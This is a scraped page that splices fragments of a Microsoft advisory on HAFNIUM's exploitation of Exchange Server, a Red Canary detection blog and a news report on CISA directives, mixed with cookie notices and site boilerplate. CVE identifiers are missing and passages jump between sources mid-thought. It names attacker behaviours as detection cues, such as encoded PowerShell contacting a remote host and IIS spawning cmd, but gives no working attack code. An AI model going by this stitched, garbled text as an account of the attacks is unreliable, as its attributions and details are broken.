HAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs. HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant , for command and control.
Microsoft is providing the following details to help our customers understand the techniques used by HAFNIUM to exploit these vulnerabilities and enable more effective defense against any future attacks against unpatched systems. CVE is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program.
This requires administrator permission or another vulnerability to exploit. CVE is a post-authentication arbitrary file write vulnerability in Exchange. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise.
HAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users. Our blog, Defending Exchange servers under attack , offers advice for improving defenses against Exchange server compromise.
Customers can also find additional guidance about web shell attacks in our blog Web shell attacks continue to rise. The below sections provide indicators of compromise IOCs , detection guidance, and advanced hunting queries to help customers investigate this activity using Exchange server logs, Azure Sentinel, Microsoft Defender for Endpoint, and Microsoft Defender.
We encourage our customers to conduct investigations and implement proactive detections to identify possible prior campaigns and prevent future campaigns that may target their systems. The Microsoft Exchange Server team has published a blog post on these new Security Updates providing a script to get a quick inventory of the patch-level status of on-premises Exchange servers and answer some basic questions around installation of these patches.
InternalUrl and ExternalUrl should only be valid Uris. Microsoft is releasing a feed of observed indicators of compromise IOCs in related attacks. However, we realize not all organizations have the expertise or resources to do this, so the above steps are a starting point for remediation if you cannot perform further investigation and response.
Microsoft Exchange Server Vulnerabilities Mitigations. Twitter thread by Kyle Hanslovan. Disclaimer: The information in the Red Canary Blog is made available for educational purposes only. This blog and the content contained within it should not be used as a substitute for competent professional advice from a security professional familiar with your environment.
All Threat Detection Report content is fully available through this website. If you prefer to download a PDF, just fill out this form and let us know what email to send it to. Contact Us. Sapphire Pigeon exhibited the following unique patterns, which we tweeted about on afternoon of March 5: Use of encoded PowerShell to connect to a remote host.
Check out the detection opportunities section below! Creation of a scheduled task named Winnet :. IIS worker process spawning cmd. IIS worker process writing. The following image shows Sapphire Pigeon activity, but this analytic is useful beyond detecting just that cluster: Additional post-exploitation detection opportunities While we wanted to focus detection opportunities on what we have observed recently, there are a wealth of other opportunities to detect any follow-on post-exploitation activity that might occur after these web shells are dropped.
Looking for signs of compromise If your Exchange server was unpatched and exposed to the internet, you should assume compromise. Related Articles. Detection and response Better know a data source: Antimalware Scan Interface. Detection and response 6 infosec lessons from the Matrix movies. Detection and response Intelligence Insights: December Subscribe to our blog. See what it's like to have a partner in the fight. Experience the difference between a sense of security and actual security.
Download the report All Threat Detection Report content is fully available through this website. Thanks for your interest! Check your inbox, the Threat Detection Report is headed your way.
Our website uses cookies to provide you with a better browsing experience. More information can be found in our Privacy Policy. Close Privacy Overview This website uses cookies to improve your experience while you navigate through the website.
Out of these cookies, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities of the website.
We also use third-party cookies that help us analyze and understand how you use this website. The move follows the discovery of software flaws in on-premise versions of Microsoft Exchange Server being exploited by attackers. Exploitation of these vulnerabilities allows an attacker to access on-premises Exchange Servers, enabling them to gain persistent system access and control of an enterprise network.
The new CISA orders are aimed at ensuring agencies use newly developed Microsoft tools to identify any compromises that remain undetected. They need to be followed even if all steps in the earlier directive were completed. CISA also identified Microsoft Exchange servers still in operation and hosted by or on behalf of federal agencies that require additional hardening," CISA says in the supplement.
The Microsoft scanner can use up a lot of a server's processing capacity, so CISA recommends running the scan during off-peak hours. The other tool agencies are instructed to run is the Test-ProxyLogon. The script can be run as administrator to check Exchange and IIS logs to discover signs of attacker activity, such as files written to the server and the presence of web shell scripts used for persistence.
CISA also issued hardening instructions for Exchange servers including applying software updates, ensuring that only a supported version of Exchange is being used, and to review permissions and roles. The hardening requirements need to be complete by Monday, June 28, Agencies need to "enumerate accounts and groups that are leveraged by Exchange installations and review their permissions and roles.
They will also need to review membership in highly privileged groups such as Administrators, Remote Desktop Users, and Enterprise Admins" and "review sensitive roles such as Mailbox Import Export and Organization Management e.
0コメント